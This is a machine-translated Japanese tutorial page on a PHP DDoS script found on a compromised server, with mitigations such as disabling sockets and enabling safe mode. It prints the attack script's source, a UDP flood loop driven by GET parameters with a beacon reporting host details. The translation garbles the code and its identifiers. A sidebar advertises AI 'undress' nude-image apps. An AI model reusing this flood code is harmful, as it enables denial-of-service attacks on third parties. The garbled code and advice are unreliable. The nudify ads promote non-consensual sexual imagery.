php ddos 攻撃の解決策、php ddos 攻撃_PHP チュートリアル
php ddos攻撃ソリューション、phpddos攻撃
この記事の例では、PHP での Ddos 攻撃の解決策について説明します。参考のためにみんなで共有してください。具体的な分析は次のとおりです:
今日、私のマシンの 1 つが突然、1 秒あたり 1G を超える可能性のある大量のデータ パケットを外部に送信しました。UDP パケットを禁止するポリシーを使用していましたが、送信することはできませんでしたが、時間がかかりました。カップが多かったので、ついに解決する方法を見つけました。
まずソースコードを見てください。コードは次のとおりです:
$ポート = $_GET['ポート']
$exec_time = $_GET['時間']
$センドレン = 65535
$パケット = 0; 無視_ユーザー_中止(真)
if (StrLen($host)==0 または StrLen($port)==0 または StrLen($exec_time)==0){
If (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE' ].$_GET['ネズミ']
; 出る
echo "パラメータを空にすることはできません!"; 出る
}
for($i=0;$i $out .= "A"; }
$max_time = time()+$exec_time
while(1){
$パケット++
If(time() > $max_time){
休憩
}
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5); if($fp){
fwrite($fp, $out); fclose($fp); }
}
echo "送信ホスト:$host:$port
"; echo "送信フロー: $packets * ($Sendlen/1024=" .round($Sendlen/1024, 2) . ")kb / 1024 = " .round($packets*$Sendlen/1024/1024, 2) " mb
";
echo "送信速度:" .round($packets/$exec_time, 2) .round($packets/$exec_time*$Sendlen/1024/1024, 2) . ?>
キーコードは次のとおりです:
コードをコピーします
コードは次のとおりです:
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
方法は非常に簡単です。UDP パケットをターゲット ホストに送信し、無限ループを定義します。これにより、より大きな圧力がかかります。 このスクリプトを実行するサーバーは最初に独自のネットワーク帯域幅、CPU、その他のリソースを大量に消費するため、この負荷がかかります。このスクリプトを使用してターゲット サイトに負荷をかける場合は、スクリプトを実行する必要があります。 、DDOS では、fsockopen は外部リクエストのリクエストに使用されるため、リクエストは許可されません。
コードは次のとおりです:
allow_url_fopen = Off
この方法でもパッケージを送信できる場合、コードは次のようになります:
拡張子=php_sockets.dll
が
に変更されました;拡張子=php_sockets.dll
APACHE、IIS、NGINX を再起動して、PHP DDOS がパッケージを送信しないようにします。
さらに、一部のネチズンは、スクリプトを無効にしてタイムアウトしないように設定するのは非常に簡単だと言いました:
1. set_time_limit 関数を無効にする
2. PHP のセーフ モードを有効にします (safe_mode=on)。
ソケット関数を無効にすると、すべてのソケット モジュールを直接無効にするか、fsockopen 関数を無効にすることができます。ソケットはパスワードを取得するためにメールを送信するためによく使用されるため、この場合はセーフ モードを直接有効にすることをお勧めします。スクリプトは 30 秒ごとにタイムアウトします。30 秒ごとにクリックして DDOS を起動するほど孤独な「ハッカー」はいないと推定されています。 経験:この種の問題は通常、Webサイトのセキュリティとサーバーのセキュリティに注意を払う必要があり、macofeeの使用方法を知っていれば簡単に侵入されなくなります。 、一部のウェブサイトを制限した方が良いでしょう。 この記事で説明した内容が皆様の PHP プログラミング設計に役立つことを願っています。
http://www.bkjia.com/PHPjc/939403.html
ホットAIツール

Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。

Undress AI Tool
脱衣画像を無料で

Clothoff.io
AI衣類リムーバー

AI Hentai Generator
AIヘンタイを無料で生成します。

人気の記事

ホットツール

メモ帳++7.3.1
使いやすく無料のコードエディター

SublimeText3 中国語版
中国語版、とても使いやすい

ゼンドスタジオ 13.0.1
強力な PHP 統合開発環境

ドリームウィーバー CS6
ビジュアル Web 開発ツール

SublimeText3 Mac版
神レベルのコード編集ソフト(SublimeText3)

ホットトピック









PSの「読み込み」の問題は、リソースアクセスまたは処理の問題によって引き起こされます。ハードディスクの読み取り速度は遅いか悪いです。CrystaldiskInfoを使用して、ハードディスクの健康を確認し、問題のあるハードディスクを置き換えます。不十分なメモリ:高解像度の画像と複雑な層処理に対するPSのニーズを満たすためのメモリをアップグレードします。グラフィックカードドライバーは時代遅れまたは破損しています:ドライバーを更新して、PSとグラフィックスカードの間の通信を最適化します。ファイルパスが長すぎるか、ファイル名に特殊文字があります。短いパスを使用して特殊文字を避けます。 PS独自の問題:PSインストーラーを再インストールまたは修理します。

PHPでは、予測不可能なトークンを使用して、CSRF攻撃を効果的に防ぐことができます。特定の方法には次のものが含まれます。1。フォームのCSRFトークンを生成および埋め込みます。 2.リクエストを処理するときにトークンの有効性を確認します。

PHPでは、最終的なキーワードを使用して、クラスが継承されないようにし、メソッドが上書きされます。 1)クラスを決勝としてマークする場合、クラスを継承することはできません。 2)メソッドを最終的にマークする場合、メソッドはサブクラスによって書き換えられません。最終的なキーワードを使用すると、コードの安定性とセキュリティが保証されます。

ブートがさまざまな理由によって引き起こされる可能性がある場合、「読み込み」に巻き込まれたPS:腐敗したプラグインまたは競合するプラグインを無効にします。破損した構成ファイルの削除または名前変更。不十分なプログラムを閉じたり、メモリをアップグレードしたりして、メモリが不十分であることを避けます。ソリッドステートドライブにアップグレードして、ハードドライブの読み取りをスピードアップします。 PSを再インストールして、破損したシステムファイルまたはインストールパッケージの問題を修復します。エラーログ分析の起動プロセス中にエラー情報を表示します。

ブートストラップリストのデフォルトスタイルは、CSSオーバーライドで削除できます。より具体的なCSSルールとセレクターを使用し、「近接原理」と「重量原理」に従って、ブートストラップのデフォルトスタイルをオーバーライドします。スタイルの競合を避けるために、よりターゲットを絞ったセレクターを使用できます。オーバーライドが失敗した場合は、カスタムCSSの重量を調整します。同時に、パフォーマンスの最適化に注意を払い、重要な!の過剰使用を避け、簡潔で効率的なCSSコードを書いてください。

VUEのデフォルトのエクスポートが明らかになります:デフォルトのエクスポート、名前を指定せずにモジュール全体を一度にインポートします。コンポーネントはコンパイル時にモジュールに変換され、使用可能なモジュールはビルドツールを介してパッケージ化されます。名前付きのエクスポートと組み合わせて、定数や関数などの他のコンテンツをエクスポートできます。よくある質問には、循環依存関係、パスエラー、およびビルドエラーが含まれ、コードとインポートステートメントを慎重に調べる必要があります。ベストプラクティスには、コードセグメンテーション、読みやすさ、コンポーネントの再利用が含まれます。

PHPの厳格なタイプは、declare(strict_types = 1)を追加することで有効になります。ファイルの上部に。 1)関数パラメーターのタイプチェックと戻り値を強制して、暗黙の型変換を防ぎます。 2)厳格なタイプを使用すると、コードの信頼性と予測可能性を改善し、バグを減らし、保守性と読みやすさを向上させることができます。

ルートとしてMySQLにログインできない主な理由は、許可の問題、構成ファイルエラー、一貫性のないパスワード、ソケットファイルの問題、またはファイアウォール傍受です。解決策には、構成ファイルのBind-Addressパラメーターが正しく構成されているかどうかを確認します。ルートユーザー許可が変更されているか削除されてリセットされているかを確認します。ケースや特殊文字を含むパスワードが正確であることを確認します。ソケットファイルの許可設定とパスを確認します。ファイアウォールがMySQLサーバーへの接続をブロックすることを確認します。
